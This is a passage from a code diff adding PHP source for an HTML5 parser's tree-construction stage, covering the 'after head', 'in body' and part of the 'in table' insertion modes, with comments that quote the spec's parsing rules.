the current node is a head element, act as if an end tag + token with the tag name "head" had been seen. */ + if($this->head_pointer->isSameNode(end($this->stack))) { + $this->inHead(array( + 'name' => 'head', + 'type' => HTML5::ENDTAG + )); + + /* Otherwise, change the insertion mode to "after head". */ + } else { + $this->mode = self::AFTER_HEAD; + } + + /* Then, reprocess the current token. */ + return $this->afterHead($token); + } + } + + private function afterHead($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data attribute + set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag token with the tag name "body" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'body') { + /* Insert a body element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in body". */ + $this->mode = self::IN_BODY; + + /* A start tag token with the tag name "frameset" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'frameset') { + /* Insert a frameset element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in frameset". */ + $this->mode = self::IN_FRAME; + + /* A start tag token whose tag name is one of: "base", "link", "meta", + "script", "style", "title" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('base', 'link', 'meta', 'script', 'style', 'title'))) { + /* Parse error. Switch the insertion mode back to "in head" and + reprocess the token. */ + $this->mode = self::IN_HEAD; + return $this->inHead($token); + + /* Anything else */ + } else { + /* Act as if a start tag token with the tag name "body" and no + attributes had been seen, and then reprocess the current token. */ + $this->afterHead(array( + 'name' => 'body', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inBody($token); + } + } + + private function inBody($token) { + /* Handle the token as follows: */ + + switch($token['type']) { + /* A character token */ + case HTML5::CHARACTR: + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Append the token's character to the current node. */ + $this->insertText($token['data']); + break; + + /* A comment token */ + case HTML5::COMMENT: + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + break; + + case HTML5::STARTTAG: + switch($token['name']) { + /* A start tag token whose tag name is one of: "script", + "style" */ + case 'script': case 'style': + /* Process the token as if the insertion mode had been "in + head". */ + return $this->inHead($token); + break; + + /* A start tag token whose tag name is one of: "base", "link", + "meta", "title" */ + case 'base': case 'link': case 'meta': case 'title': + /* Parse error. Process the token as if the insertion mode + had been "in head". */ + return $this->inHead($token); + break; + + /* A start tag token with the tag name "body" */ + case 'body': + /* Parse error. If the second element on the stack of open + elements is not a body element, or, if the stack of open + elements has only one node on it, then ignore the token. + (innerHTML case) */ + if(count($this->stack) === 1 || $this->stack[1]->nodeName !== 'body') { + // Ignore + + /* Otherwise, for each attribute on the token, check to see + if the attribute is already present on the body element (the + second element) on the stack of open elements. If it is not, + add the attribute and its corresponding value to that + element. */ + } else { + foreach($token['attr'] as $attr) { + if(!$this->stack[1]->hasAttribute($attr['name'])) { + $this->stack[1]->setAttribute($attr['name'], $attr['value']); + } + } + } + break; + + /* A start tag whose tag name is one of: "address", + "blockquote", "center", "dir", "div", "dl", "fieldset", + "listing", "menu", "ol", "p", "ul" */ + case 'address': case 'blockquote': case 'center': case 'dir': + case 'div': case 'dl': case 'fieldset': case 'listing': + case 'menu': case 'ol': case 'p': case 'ul': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been + seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + break; + + /* A start tag whose tag name is "form" */ + case 'form': + /* If the form element pointer is not null, ignore the + token with a parse error. */ + if($this->form_pointer !== null) { + // Ignore. + + /* Otherwise: */ + } else { + /* If the stack of open elements has a p element in + scope, then act as if an end tag with the tag name p + had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token, and set the + form element pointer to point to the element created. */ + $element = $this->insertElement($token); + $this->form_pointer = $element; + } + break; + + /* A start tag whose tag name is "li", "dd" or "dt" */ + case 'li': case 'dd': case 'dt': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been + seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + $stack_length = count($this->stack) - 1; + + for($n = $stack_length; 0 <= $n; $n--) { + /* 1. Initialise node to be the current node (the + bottommost node of the stack). */ + $stop = false; + $node = $this->stack[$n]; + $cat = $this->getElementCategory($node->tagName); + + /* 2. If node is an li, dd or dt element, then pop all + the nodes from the current node up to node, including + node, then stop this algorithm. */ + if($token['name'] === $node->tagName || ($token['name'] !== 'li' + && ($node->tagName === 'dd' || $node->tagName === 'dt'))) { + for($x = $stack_length; $x >= $n ; $x--) { + array_pop($this->stack); + } + + break; + } + + /* 3. If node is not in the formatting category, and is + not in the phrasing category, and is not an address or + div element, then stop this algorithm. */ + if($cat !== self::FORMATTING && $cat !== self::PHRASING && + $node->tagName !== 'address' && $node->tagName !== 'div') { + break; + } + } + + /* Finally, insert an HTML element with the same tag + name as the token's. */ + $this->insertElement($token); + break; + + /* A start tag token whose tag name is "plaintext" */ + case 'plaintext': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been + seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + return HTML5::PLAINTEXT; + break; + + /* A start tag whose tag name is one of: "h1", "h2", "h3", "h4", + "h5", "h6" */ + case 'h1': case 'h2': case 'h3': case 'h4': case 'h5': case 'h6': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* If the stack of open elements has in scope an element whose + tag name is one of "h1", "h2", "h3", "h4", "h5", or "h6", then + this is a parse error; pop elements from the stack until an + element with one of those tag names has been popped from the + stack. */ + while($this->elementInScope(array('h1', 'h2', 'h3', 'h4', 'h5', 'h6'))) { + array_pop($this->stack); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + break; + + /* A start tag whose tag name is "a" */ + case 'a': + /* If the list of active formatting elements contains + an element whose tag name is "a" between the end of the + list and the last marker on the list (or the start of + the list if there is no marker on the list), then this + is a parse error; act as if an end tag with the tag name + "a" had been seen, then remove that element from the list + of active formatting elements and the stack of open + elements if the end tag didn't already remove it (it + might not have if the element is not in table scope). */ + $leng = count($this->a_formatting); + + for($n = $leng - 1; $n >= 0; $n--) { + if($this->a_formatting[$n] === self::MARKER) { + break; + + } elseif($this->a_formatting[$n]->nodeName === 'a') { + $this->emitToken(array( + 'name' => 'a', + 'type' => HTML5::ENDTAG + )); + break; + } + } + + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $el = $this->insertElement($token); + + /* Add that element to the list of active formatting + elements. */ + $this->a_formatting[] = $el; + break; + + /* A start tag whose tag name is one of: "b", "big", "em", "font", + "i", "nobr", "s", "small", "strike", "strong", "tt", "u" */ + case 'b': case 'big': case 'em': case 'font': case 'i': + case 'nobr': case 's': case 'small': case 'strike': + case 'strong': case 'tt': case 'u': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $el = $this->insertElement($token); + + /* Add that element to the list of active formatting + elements. */ + $this->a_formatting[] = $el; + break; + + /* A start tag token whose tag name is "button" */ + case 'button': + /* If the stack of open elements has a button element in scope, + then this is a parse error; act as if an end tag with the tag + name "button" had been seen, then reprocess the token. (We don't + do that. Unnecessary.) */ + if($this->elementInScope('button')) { + $this->inBody(array( + 'name' => 'button', + 'type' => HTML5::ENDTAG + )); + } + + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Insert a marker at the end of the list of active + formatting elements. */ + $this->a_formatting[] = self::MARKER; + break; + + /* A start tag token whose tag name is one of: "marquee", "object" */ + case 'marquee': case 'object': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Insert a marker at the end of the list of active + formatting elements. */ + $this->a_formatting[] = self::MARKER; + break; + + /* A start tag token whose tag name is "xmp" */ + case 'xmp': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Switch the content model flag to the CDATA state. */ + return HTML5::CDATA; + break; + + /* A start tag whose tag name is "table" */ + case 'table': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in table". */ + $this->mode = self::IN_TABLE; + break; + + /* A start tag whose tag name is one of: "area", "basefont", + "bgsound", "br", "embed", "img", "param", "spacer", "wbr" */ + case 'area': case 'basefont': case 'bgsound': case 'br': + case 'embed': case 'img': case 'param': case 'spacer': + case 'wbr': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Immediately pop the current node off the stack of open elements. */ + array_pop($this->stack); + break; + + /* A start tag whose tag name is "hr" */ + case 'hr': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Immediately pop the current node off the stack of open elements. */ + array_pop($this->stack); + break; + + /* A start tag whose tag name is "image" */ + case 'image': + /* Parse error. Change the token's tag name to "img" and + reprocess it. (Don't ask.) */ + $token['name'] = 'img'; + return $this->inBody($token); + break; + + /* A start tag whose tag name is "input" */ + case 'input': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an input element for the token. */ + $element = $this->insertElement($token, false); + + /* If the form element pointer is not null, then associate the + input element with the form element pointed to by the form + element pointer. */ + $this->form_pointer !== null + ? $this->form_pointer->appendChild($element) + : end($this->stack)->appendChild($element); + + /* Pop that input element off the stack of open elements. */ + array_pop($this->stack); + break; + + /* A start tag whose tag name is "isindex" */ + case 'isindex': + /* Parse error. */ + // w/e + + /* If the form element pointer is not null, + then ignore the token. */ + if($this->form_pointer === null) { + /* Act as if a start tag token with the tag name "form" had + been seen. */ + $this->inBody(array( + 'name' => 'body', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a start tag token with the tag name "hr" had + been seen. */ + $this->inBody(array( + 'name' => 'hr', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a start tag token with the tag name "p" had + been seen. */ + $this->inBody(array( + 'name' => 'p', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a start tag token with the tag name "label" + had been seen. */ + $this->inBody(array( + 'name' => 'label', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a stream of character tokens had been seen. */ + $this->insertText('This is a searchable index. '. + 'Insert your search keywords here: '); + + /* Act as if a start tag token with the tag name "input" + had been seen, with all the attributes from the "isindex" + token, except with the "name" attribute set to the value + "isindex" (ignoring any explicit "name" attribute). */ + $attr = $token['attr']; + $attr[] = array('name' => 'name', 'value' => 'isindex'); + + $this->inBody(array( + 'name' => 'input', + 'type' => HTML5::STARTTAG, + 'attr' => $attr + )); + + /* Act as if a stream of character tokens had been seen + (see below for what they should say). */ + $this->insertText('This is a searchable index. '. + 'Insert your search keywords here: '); + + /* Act as if an end tag token with the tag name "label" + had been seen. */ + $this->inBody(array( + 'name' => 'label', + 'type' => HTML5::ENDTAG + )); + + /* Act as if an end tag token with the tag name "p" had + been seen. */ + $this->inBody(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + + /* Act as if a start tag token with the tag name "hr" had + been seen. */ + $this->inBody(array( + 'name' => 'hr', + 'type' => HTML5::ENDTAG + )); + + /* Act as if an end tag token with the tag name "form" had + been seen. */ + $this->inBody(array( + 'name' => 'form', + 'type' => HTML5::ENDTAG + )); + } + break; + + /* A start tag whose tag name is "textarea" */ + case 'textarea': + $this->insertElement($token); + + /* Switch the tokeniser's content model flag to the + RCDATA state. */ + return HTML5::RCDATA; + break; + + /* A start tag whose tag name is one of: "iframe", "noembed", + "noframes" */ + case 'iframe': case 'noembed': case 'noframes': + $this->insertElement($token); + + /* Switch the tokeniser's content model flag to the CDATA state. */ + return HTML5::CDATA; + break; + + /* A start tag whose tag name is "select" */ + case 'select': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in select". */ + $this->mode = self::IN_SELECT; + break; + + /* A start or end tag whose tag name is one of: "caption", "col", + "colgroup", "frame", "frameset", "head", "option", "optgroup", + "tbody", "td", "tfoot", "th", "thead", "tr". */ + case 'caption': case 'col': case 'colgroup': case 'frame': + case 'frameset': case 'head': case 'option': case 'optgroup': + case 'tbody': case 'td': case 'tfoot': case 'th': case 'thead': + case 'tr': + // Parse error. Ignore the token. + break; + + /* A start or end tag whose tag name is one of: "event-source", + "section", "nav", "article", "aside", "header", "footer", + "datagrid", "command" */ + case 'event-source': case 'section': case 'nav': case 'article': + case 'aside': case 'header': case 'footer': case 'datagrid': + case 'command': + // Work in progress! + break; + + /* A start tag token not covered by the previous entries */ + default: + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + $this->insertElement($token); + break; + } + break; + + case HTML5::ENDTAG: + switch($token['name']) { + /* An end tag with the tag name "body" */ + case 'body': + /* If the second element in the stack of open elements is + not a body element, this is a parse error. Ignore the token. + (innerHTML case) */ + if(count($this->stack) < 2 || $this->stack[1]->nodeName !== 'body') { + // Ignore. + + /* If the current node is not the body element, then this + is a parse error. */ + } elseif(end($this->stack)->nodeName !== 'body') { + // Parse error. + } + + /* Change the insertion mode to "after body". */ + $this->mode = self::AFTER_BODY; + break; + + /* An end tag with the tag name "html" */ + case 'html': + /* Act as if an end tag with tag name "body" had been seen, + then, if that token wasn't ignored, reprocess the current + token. */ + $this->inBody(array( + 'name' => 'body', + 'type' => HTML5::ENDTAG + )); + + return $this->afterBody($token); + break; + + /* An end tag whose tag name is one of: "address", "blockquote", + "center", "dir", "div", "dl", "fieldset", "listing", "menu", + "ol", "pre", "ul" */ + case 'address': case 'blockquote': case 'center': case 'dir': + case 'div': case 'dl': case 'fieldset': case 'listing': + case 'menu': case 'ol': case 'pre': case 'ul': + /* If the stack of open elements has an element in scope + with the same tag name as that of the token, then generate + implied end tags. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(); + + /* Now, if the current node is not an element with + the same tag name as that of the token, then this + is a parse error. */ + // w/e + + /* If the stack of open elements has an element in + scope with the same tag name as that of the token, + then pop elements from this stack until an element + with that tag name has been popped from the stack. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === $token['name']) { + $n = -1; + } + + array_pop($this->stack); + } + } + break; + + /* An end tag whose tag name is "form" */ + case 'form': + /* If the stack of open elements has an element in scope + with the same tag name as that of the token, then generate + implied end tags. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(); + + } + + if(end($this->stack)->nodeName !== $token['name']) { + /* Now, if the current node is not an element with the + same tag name as that of the token, then this is a parse + error. */ + // w/e + + } else { + /* Otherwise, if the current node is an element with + the same tag name as that of the token pop that element + from the stack. */ + array_pop($this->stack); + } + + /* In any case, set the form element pointer to null. */ + $this->form_pointer = null; + break; + + /* An end tag whose tag name is "p" */ + case 'p': + /* If the stack of open elements has a p element in scope, + then generate implied end tags, except for p elements. */ + if($this->elementInScope('p')) { + $this->generateImpliedEndTags(array('p')); + + /* If the current node is not a p element, then this is + a parse error. */ + // k + + /* If the stack of open elements has a p element in + scope, then pop elements from this stack until the stack + no longer has a p element in scope. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->elementInScope('p')) { + array_pop($this->stack); + + } else { + break; + } + } + } + break; + + /* An end tag whose tag name is "dd", "dt", or "li" */ + case 'dd': case 'dt': case 'li': + /* If the stack of open elements has an element in scope + whose tag name matches the tag name of the token, then + generate implied end tags, except for elements with the + same tag name as the token. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(array($token['name'])); + + /* If the current node is not an element with the same + tag name as the token, then this is a parse error. */ + // w/e + + /* If the stack of open elements has an element in scope + whose tag name matches the tag name of the token, then + pop elements from this stack until an element with that + tag name has been popped from the stack. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === $token['name']) { + $n = -1; + } + + array_pop($this->stack); + } + } + break; + + /* An end tag whose tag name is one of: "h1", "h2", "h3", "h4", + "h5", "h6" */ + case 'h1': case 'h2': case 'h3': case 'h4': case 'h5': case 'h6': + $elements = array('h1', 'h2', 'h3', 'h4', 'h5', 'h6'); + + /* If the stack of open elements has in scope an element whose + tag name is one of "h1", "h2", "h3", "h4", "h5", or "h6", then + generate implied end tags. */ + if($this->elementInScope($elements)) { + $this->generateImpliedEndTags(); + + /* Now, if the current node is not an element with the same + tag name as that of the token, then this is a parse error. */ + // w/e + + /* If the stack of open elements has in scope an element + whose tag name is one of "h1", "h2", "h3", "h4", "h5", or + "h6", then pop elements from the stack until an element + with one of those tag names has been popped from the stack. */ + while($this->elementInScope($elements)) { + array_pop($this->stack); + } + } + break; + + /* An end tag whose tag name is one of: "a", "b", "big", "em", + "font", "i", "nobr", "s", "small", "strike", "strong", "tt", "u" */ + case 'a': case 'b': case 'big': case 'em': case 'font': + case 'i': case 'nobr': case 's': case 'small': case 'strike': + case 'strong': case 'tt': case 'u': + /* 1. Let the formatting element be the last element in + the list of active formatting elements that: + * is between the end of the list and the last scope + marker in the list, if any, or the start of the list + otherwise, and + * has the same tag name as the token. + */ + while(true) { + for($a = count($this->a_formatting) - 1; $a >= 0; $a--) { + if($this->a_formatting[$a] === self::MARKER) { + break; + + } elseif($this->a_formatting[$a]->tagName === $token['name']) { + $formatting_element = $this->a_formatting[$a]; + $in_stack = in_array($formatting_element, $this->stack, true); + $fe_af_pos = $a; + break; + } + } + + /* If there is no such node, or, if that node is + also in the stack of open elements but the element + is not in scope, then this is a parse error. Abort + these steps. The token is ignored. */ + if(!isset($formatting_element) || ($in_stack && + !$this->elementInScope($token['name']))) { + break; + + /* Otherwise, if there is such a node, but that node + is not in the stack of open elements, then this is a + parse error; remove the element from the list, and + abort these steps. */ + } elseif(isset($formatting_element) && !$in_stack) { + unset($this->a_formatting[$fe_af_pos]); + $this->a_formatting = array_merge($this->a_formatting); + break; + } + + /* 2. Let the furthest block be the topmost node in the + stack of open elements that is lower in the stack + than the formatting element, and is not an element in + the phrasing or formatting categories. There might + not be one. */ + $fe_s_pos = array_search($formatting_element, $this->stack, true); + $length = count($this->stack); + + for($s = $fe_s_pos + 1; $s < $length; $s++) { + $category = $this->getElementCategory($this->stack[$s]->nodeName); + + if($category !== self::PHRASING && $category !== self::FORMATTING) { + $furthest_block = $this->stack[$s]; + } + } + + /* 3. If there is no furthest block, then the UA must + skip the subsequent steps and instead just pop all + the nodes from the bottom of the stack of open + elements, from the current node up to the formatting + element, and remove the formatting element from the + list of active formatting elements. */ + if(!isset($furthest_block)) { + for($n = $length - 1; $n >= $fe_s_pos; $n--) { + array_pop($this->stack); + } + + unset($this->a_formatting[$fe_af_pos]); + $this->a_formatting = array_merge($this->a_formatting); + break; + } + + /* 4. Let the common ancestor be the element + immediately above the formatting element in the stack + of open elements. */ + $common_ancestor = $this->stack[$fe_s_pos - 1]; + + /* 5. If the furthest block has a parent node, then + remove the furthest block from its parent node. */ + if($furthest_block->parentNode !== null) { + $furthest_block->parentNode->removeChild($furthest_block); + } + + /* 6. Let a bookmark note the position of the + formatting element in the list of active formatting + elements relative to the elements on either side + of it in the list. */ + $bookmark = $fe_af_pos; + + /* 7. Let node and last node be the furthest block. + Follow these steps: */ + $node = $furthest_block; + $last_node = $furthest_block; + + while(true) { + for($n = array_search($node, $this->stack, true) - 1; $n >= 0; $n--) { + /* 7.1 Let node be the element immediately + prior to node in the stack of open elements. */ + $node = $this->stack[$n]; + + /* 7.2 If node is not in the list of active + formatting elements, then remove node from + the stack of open elements and then go back + to step 1. */ + if(!in_array($node, $this->a_formatting, true)) { + unset($this->stack[$n]); + $this->stack = array_merge($this->stack); + + } else { + break; + } + } + + /* 7.3 Otherwise, if node is the formatting + element, then go to the next step in the overall + algorithm. */ + if($node === $formatting_element) { + break; + + /* 7.4 Otherwise, if last node is the furthest + block, then move the aforementioned bookmark to + be immediately after the node in the list of + active formatting elements. */ + } elseif($last_node === $furthest_block) { + $bookmark = array_search($node, $this->a_formatting, true) + 1; + } + + /* 7.5 If node has any children, perform a + shallow clone of node, replace the entry for + node in the list of active formatting elements + with an entry for the clone, replace the entry + for node in the stack of open elements with an + entry for the clone, and let node be the clone. */ + if($node->hasChildNodes()) { + $clone = $node->cloneNode(); + $s_pos = array_search($node, $this->stack, true); + $a_pos = array_search($node, $this->a_formatting, true); + + $this->stack[$s_pos] = $clone; + $this->a_formatting[$a_pos] = $clone; + $node = $clone; + } + + /* 7.6 Insert last node into node, first removing + it from its previous parent node if any. */ + if($last_node->parentNode !== null) { + $last_node->parentNode->removeChild($last_node); + } + + $node->appendChild($last_node); + + /* 7.7 Let last node be node. */ + $last_node = $node; + } + + /* 8. Insert whatever last node ended up being in + the previous step into the common ancestor node, + first removing it from its previous parent node if + any. */ + if($last_node->parentNode !== null) { + $last_node->parentNode->removeChild($last_node); + } + + $common_ancestor->appendChild($last_node); + + /* 9. Perform a shallow clone of the formatting + element. */ + $clone = $formatting_element->cloneNode(); + + /* 10. Take all of the child nodes of the furthest + block and append them to the clone created in the + last step. */ + while($furthest_block->hasChildNodes()) { + $child = $furthest_block->firstChild; + $furthest_block->removeChild($child); + $clone->appendChild($child); + } + + /* 11. Append that clone to the furthest block. */ + $furthest_block->appendChild($clone); + + /* 12. Remove the formatting element from the list + of active formatting elements, and insert the clone + into the list of active formatting elements at the + position of the aforementioned bookmark. */ + $fe_af_pos = array_search($formatting_element, $this->a_formatting, true); + unset($this->a_formatting[$fe_af_pos]); + $this->a_formatting = array_merge($this->a_formatting); + + $af_part1 = array_slice($this->a_formatting, 0, $bookmark - 1); + $af_part2 = array_slice($this->a_formatting, $bookmark, count($this->a_formatting)); + $this->a_formatting = array_merge($af_part1, array($clone), $af_part2); + + /* 13. Remove the formatting element from the stack + of open elements, and insert the clone into the stack + of open elements immediately after (i.e. in a more + deeply nested position than) the position of the + furthest block in that stack. */ + $fe_s_pos = array_search($formatting_element, $this->stack, true); + $fb_s_pos = array_search($furthest_block, $this->stack, true); + unset($this->stack[$fe_s_pos]); + + $s_part1 = array_slice($this->stack, 0, $fb_s_pos); + $s_part2 = array_slice($this->stack, $fb_s_pos + 1, count($this->stack)); + $this->stack = array_merge($s_part1, array($clone), $s_part2); + + /* 14. Jump back to step 1 in this series of steps. */ + unset($formatting_element, $fe_af_pos, $fe_s_pos, $furthest_block); + } + break; + + /* An end tag token whose tag name is one of: "button", + "marquee", "object" */ + case 'button': case 'marquee': case 'object': + /* If the stack of open elements has an element in scope whose + tag name matches the tag name of the token, then generate implied + tags. */ + if($this->elementInScope($token['name'])) { + $this->generateImpliedEndTags(); + + /* Now, if the current node is not an element with the same + tag name as the token, then this is a parse error. */ + // k + + /* Now, if the stack of open elements has an element in scope + whose tag name matches the tag name of the token, then pop + elements from the stack until that element has been popped from + the stack, and clear the list of active formatting elements up + to the last marker. */ + for($n = count($this->stack) - 1; $n >= 0; $n--) { + if($this->stack[$n]->nodeName === $token['name']) { + $n = -1; + } + + array_pop($this->stack); + } + + $marker = end(array_keys($this->a_formatting, self::MARKER, true)); + + for($n = count($this->a_formatting) - 1; $n > $marker; $n--) { + array_pop($this->a_formatting); + } + } + break; + + /* Or an end tag whose tag name is one of: "area", "basefont", + "bgsound", "br", "embed", "hr", "iframe", "image", "img", + "input", "isindex", "noembed", "noframes", "param", "select", + "spacer", "table", "textarea", "wbr" */ + case 'area': case 'basefont': case 'bgsound': case 'br': + case 'embed': case 'hr': case 'iframe': case 'image': + case 'img': case 'input': case 'isindex': case 'noembed': + case 'noframes': case 'param': case 'select': case 'spacer': + case 'table': case 'textarea': case 'wbr': + // Parse error. Ignore the token. + break; + + /* An end tag token not covered by the previous entries */ + default: + for($n = count($this->stack) - 1; $n >= 0; $n--) { + /* Initialise node to be the current node (the bottommost + node of the stack). */ + $node = end($this->stack); + + /* If node has the same tag name as the end tag token, + then: */ + if($token['name'] === $node->nodeName) { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* If the tag name of the end tag token does not + match the tag name of the current node, this is a + parse error. */ + // k + + /* Pop all the nodes from the current node up to + node, including node, then stop this algorithm. */ + for($x = count($this->stack) - $n; $x >= $n; $x--) { + array_pop($this->stack); + } + + } else { + $category = $this->getElementCategory($node); + + if($category !== self::SPECIAL && $category !== self::SCOPING) { + /* Otherwise, if node is in neither the formatting + category nor the phrasing category, then this is a + parse error. Stop this algorithm. The end tag token + is ignored. */ + return false; + } + } + } + break; + } + break; + } + } + + private function inTable($token) { + $clear = array('html', 'table'); + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $text = $this->dom->createTextNode($token['data']); + end($this->stack)->appendChild($text); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + end($this->stack)->appendChild($comment); + + /* A start tag whose tag name is "caption" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'caption') { + /* Clear the stack back to a table context. */ + $this->clearStackToTableContext($clear); + + /* Insert a marker at the end of the list of active + formatting elements. */ + $this->a_formatting[] = self::MARKER; + + /* Insert an HTML element for the token, then switch the + insertion mode to "in caption". */ + $this->insertElement($token); + $this->mode = self::IN_CAPTION; + + /* A start tag whose tag name is "colgroup" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'colgroup') { + /* Clear the stack back to a table context. */ + $this->clearStackToTableContext($clear); + + /* Insert an HTML element for the token, then switch the + insertion mode to "in column group". */ + $this->insertElement($token); + $this->mode = self::IN_CGROUP; + + /* A start tag whose tag name is "col" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'col') { + $this->inTable(array( + 'name' => 'colgroup', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + $this->inColumnGroup($token); + + /* A start tag whose tag name is one of: "tbody", "tfoot", "thead" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('tbody', 'tfoot', 'thead'))) { + /* Clear the stack back to a table context. */ + $this->clearStackToTableContext($clear); + + /* Insert an HTML element for the token, then switch the insertion + mode to "in table body". */ + $this->insertElement($token); + $this->mode = self::IN_TBODY; + + /* A start tag whose tag name is one of: "td", "th", "tr" */ + } elseif($token['type'] === HTML5::STARTTAG && + in_array($token['name'], array('td', 'th', 'tr'))) { + /* Act as if a start tag token with the tag name "tbody" had been + seen, then reprocess the current token. */ + $this->inTable(array( + 'name' => 'tbody', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inTableBody($token); + + /* A start tag whose tag name is "table" */ + } elseif($token['type'] === HTML5::STARTTAG && + $token['name'] === 'table') { + /* Parse error. Act as if an end tag token with the tag name "table" + had been seen, then, if that token wasn't ignored, reprocess the + current token. */ + $this->inTable(array( + 'name' => 'table', + 'type' => HTML5::ENDTAG + )); + + return $this->mainPhase($token); + + /* An end tag whose tag name is "table" */ + } elseif($token['type'] === HTML5::ENDTAG && + $token['name'] === 'table') { + /* If the stack of open elements does not have an element in table + scope with the same tag name as the token, this is a parse error. + Ignore the token. (innerHTML case) */ + if(!$this->elementInScope($token['name'], true)) { + return false; + + /* Otherwise: */ + } else { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* Now, if the current node is not a table element, then this + is a parse error. */ + // w/e + + /* Pop elements from this stack until a table element has been + popped from the stack. */ + while(true) { + $current = end($this->stack)->nodeName; + array_pop($this->stack); + + if($current === 'table') { + break; + } + } + + /* Reset the insertion mode appropriately. */ + $this->resetInsertionMode(); + } + + /* An end tag whose tag name is one of: "body", "caption", "col", + "colgroup", "html", "tbody", "td", "tfoot", "th", "thead", "tr" */ + } elseif($token['type'] === HTML5::ENDTAG && in_array($token['name'], + array('body', 'caption', 'col', 'colgroup', 'html', 'tbody', 'td', + 'tfoot', 'th', 'thead', 'tr'))) { + // Parse error. Ignore the token. + + /* Anything else */ + } else { + /* Parse error. Process the token as if the insertion mode was "in + body", with the following exception: */ + + /* If 